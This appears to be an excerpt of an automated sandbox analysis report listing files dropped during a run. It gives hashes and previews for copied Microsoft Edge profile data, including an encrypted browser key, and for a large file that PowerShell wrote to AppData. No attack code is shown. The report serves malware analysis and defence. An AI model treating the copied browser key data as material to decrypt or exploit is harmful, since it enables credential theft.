                                                                                                                                      SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                      SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:117.0.2045.55

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Local State (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1371
                                                                                                                                      Entropy (8bit):5.530396431740801
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YpQBqDPak7u5rrtp1rH4hW11/ZTFyik7MJdXBuBuwBbaTNhaRXXlQoTEtCY/g:YuBqDPafJrjH/ZlrgBzBbEaN6RE5
                                                                                                                                      MD5:DD67ACA5E95728F3C753856305F163C3
                                                                                                                                      SHA1:2C4D0F54EBF5588E397AF7E32758E1E346666504
                                                                                                                                      SHA-256:8C06864E3463E9D9070B44472EE36AD9BB6AB15F12C3FB9AA046E46C9F27F199
                                                                                                                                      SHA-512:52A84E76AED2716BCB0E7832B2620DCA7785A8F2CF5801538C2CFC1287ADAEE9E1A774303193851722F60CACD56B18E3CA0E555D225E418893D5D0A87070233F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyOvUk1g=="},"profile":{"info_cache":{},"profile_counts_reported":"13379020102830794","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734546502"},"user_experienc

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Local State~RF47df6.TMP (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1371
                                                                                                                                      Entropy (8bit):5.530396431740801
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YpQBqDPak7u5rrtp1rH4hW11/ZTFyik7MJdXBuBuwBbaTNhaRXXlQoTEtCY/g:YuBqDPafJrjH/ZlrgBzBbEaN6RE5
                                                                                                                                      MD5:DD67ACA5E95728F3C753856305F163C3
                                                                                                                                      SHA1:2C4D0F54EBF5588E397AF7E32758E1E346666504
                                                                                                                                      SHA-256:8C06864E3463E9D9070B44472EE36AD9BB6AB15F12C3FB9AA046E46C9F27F199
                                                                                                                                      SHA-512:52A84E76AED2716BCB0E7832B2620DCA7785A8F2CF5801538C2CFC1287ADAEE9E1A774303193851722F60CACD56B18E3CA0E555D225E418893D5D0A87070233F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyOvUk1g=="},"profile":{"info_cache":{},"profile_counts_reported":"13379020102830794","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734546502"},"user_experienc

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Local State~RF47f00.TMP (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1371
                                                                                                                                      Entropy (8bit):5.530396431740801
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YpQBqDPak7u5rrtp1rH4hW11/ZTFyik7MJdXBuBuwBbaTNhaRXXlQoTEtCY/g:YuBqDPafJrjH/ZlrgBzBbEaN6RE5
                                                                                                                                      MD5:DD67ACA5E95728F3C753856305F163C3
                                                                                                                                      SHA1:2C4D0F54EBF5588E397AF7E32758E1E346666504
                                                                                                                                      SHA-256:8C06864E3463E9D9070B44472EE36AD9BB6AB15F12C3FB9AA046E46C9F27F199
                                                                                                                                      SHA-512:52A84E76AED2716BCB0E7832B2620DCA7785A8F2CF5801538C2CFC1287ADAEE9E1A774303193851722F60CACD56B18E3CA0E555D225E418893D5D0A87070233F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyOvUk1g=="},"profile":{"info_cache":{},"profile_counts_reported":"13379020102830794","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734546502"},"user_experienc

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Nurturing\campaign_history

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.46731661083066856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                      MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                      SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                      SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                      SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\ShaderCache\data_0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\ShaderCache\data_1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):270336
                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\ShaderCache\data_2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\ShaderCache\data_3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\ShaderCache\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):262512
                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:LsNlU/:Ls3
                                                                                                                                      MD5:651B4877242AB63D4AF556D81CFFCBD1
                                                                                                                                      SHA1:33504151C51B38870A30EC0CA89DDFB207D92DCF
                                                                                                                                      SHA-256:9B0676F4A603288EC0E72315BF794DFE7B109853CACE2064D3930FBE4C9AC497
                                                                                                                                      SHA-512:518733622597129D8377F5540B6DBBB84B1AB1D3084FB2957CF9B889F62E06784F98FC4254B7B09AD43692D6E1E4B369F0B79859833562DB69A9DB6BA6110D95
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................c...%./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29
                                                                                                                                      Entropy (8bit):3.922828737239167
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                      MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                      SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                      SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                      SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:customSynchronousLookupUris_0

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):35302
                                                                                                                                      Entropy (8bit):7.99333285466604
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                      MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                      SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                      SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                      SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\edgeSettings

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18
                                                                                                                                      Entropy (8bit):3.5724312513221195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                      MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                      SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                      SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                      SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:edgeSettings_2.0-0

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3581
                                                                                                                                      Entropy (8bit):4.459693941095613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                      MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                      SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                      SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                      SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):47
                                                                                                                                      Entropy (8bit):4.493433469104717
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                      MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                      SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                      SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                      SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):35302
                                                                                                                                      Entropy (8bit):7.99333285466604
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                      MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                      SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                      SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                      SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Variations

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):86
                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                      MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                      SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                      SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                      SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\d2950b36-69cc-4e60-8653-627656f38e7f.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1371
                                                                                                                                      Entropy (8bit):5.530396431740801
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YpQBqDPak7u5rrtp1rH4hW11/ZTFyik7MJdXBuBuwBbaTNhaRXXlQoTEtCY/g:YuBqDPafJrjH/ZlrgBzBbEaN6RE5
                                                                                                                                      MD5:DD67ACA5E95728F3C753856305F163C3
                                                                                                                                      SHA1:2C4D0F54EBF5588E397AF7E32758E1E346666504
                                                                                                                                      SHA-256:8C06864E3463E9D9070B44472EE36AD9BB6AB15F12C3FB9AA046E46C9F27F199
                                                                                                                                      SHA-512:52A84E76AED2716BCB0E7832B2620DCA7785A8F2CF5801538C2CFC1287ADAEE9E1A774303193851722F60CACD56B18E3CA0E555D225E418893D5D0A87070233F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyOvUk1g=="},"profile":{"info_cache":{},"profile_counts_reported":"13379020102830794","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734546502"},"user_experienc

                                                                                                                                      C:\Users\user\AppData\Roaming\Even.Lar

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):460840
                                                                                                                                      Entropy (8bit):5.948551648299628
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:an0wPZKMSYhbyhOlA2XF9nAjZKZKYdbjIPqJtVW71A:CfwhOW2XF9nRKYdbcqJtVW71A
                                                                                                                                      MD5:D0B7DD542D1B8C90D77315A58B37AA65
                                                                                                                                      SHA1:6FB0E42FEE626D28E24EDFB8E71E43FFCDF057C1
                                                                                                                                      SHA-256:EF2293FB054BFF28966408C57439C060BD2E1F53F2BDDC3807338AB8DE8CC8BC
                                                                                                                                      SHA-512:01B548BBA8EF070E05B5626445CB79E8A0D0D0C3000341343A8473B9CFBB1EDCDE2C644C805038D15C54852B4F7C46F42A7F77F63EBEF2EEBB7DED1CABCD012F
                                                                                                                                      Malicious:false
